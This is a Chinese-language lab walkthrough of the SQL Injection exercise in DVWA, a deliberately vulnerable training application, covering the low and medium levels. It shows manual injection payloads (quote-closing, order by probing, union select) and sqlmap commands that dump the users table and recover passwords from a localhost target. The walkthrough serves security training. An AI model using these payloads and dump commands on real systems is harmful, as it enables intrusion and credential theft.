DVWA之SQL Injection通关(低中高)
低等级
判断是数字注入还是字符型注入
判断注入类型,是数字型注入,还是字符型注入。
字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。
输入1 正常显示输入1’报错
我们可以猜出是字符型注入,继续输入1' and '1' ='1和1' and '1'='2。
1' and '1' ='1正常显示可以知道字符型
我们使用order by 进行判断字段数, 直到order by 进行报错时候就是字段数。
输入1' order by 1# 后台执行的sql语句
输入1' order by 2#
都正常
输入1' order by 3#报错
然后进行联合查询 union select
1' union select database(),user()#
等。。。。
使用工具sqlmap
查看cookie
5nfafum04v7bsuas6v6ctiha02
有了cookie
那sqlmqp
sqlmap.py -u "
http://localhost/DVWA-master/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=5nfafum04v7bsuas6v6ctiha02"
继续
后面加上 --dbs得到数据库名字
sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=5nfafum04v7bsuas6v6ctiha02" --dbs
加上-D dvwa --tables得到 表名
sqlmap.py -u "
http://localhost/DVWA-master/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=5nfafum04v7bsuas6v6ctiha02"
-D dvwa --tables
-D dvwa -T users --dump
得到指定数据库
dvwa
的
users
表的所有字段,顺便还原了
password
的明文
sqlmap.py -u "
http://localhost/DVWA-master/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=5nfafum04v7bsuas6v6ctiha02"
-D dvwa -T users --dump
中等级
medium级别使用下拉框提交数据,请求方式为POST请求,需要抓包来修改提交的参数
根据输入的用户ID查询用户信息并在页面中回显,有显示位,可以使用联合注入
执行SQL之前,使用mysqli_real_escape_string()函数转译了特殊字符,可以使用Hex()编译绕过
抓包
主要是url不显示了但是burp抓包可以看到,
.我们将request字段加入我们的测试语句中:
sqlmap -u "[目标注入点]" --data "[request]" --cookie="[站点cookie]"
request就是id=1&Submit=Submit
然后查询账户名、密码,测试语句:
sqlmap -u "[目标注入点]" --data "[request]" --cookie="[站点cookie]" -D dvwa -Tusers -C user,password --dump
或者
sqlmap -r .txt -D 【库名】 -T【表名】-C【字段名】--dump 获取数据
新建一个txt文件
High
VPS购买请点击我
文章版权声明:除非注明,否则均为主机测评原创文章,转载或复制请以超链接形式并注明出处。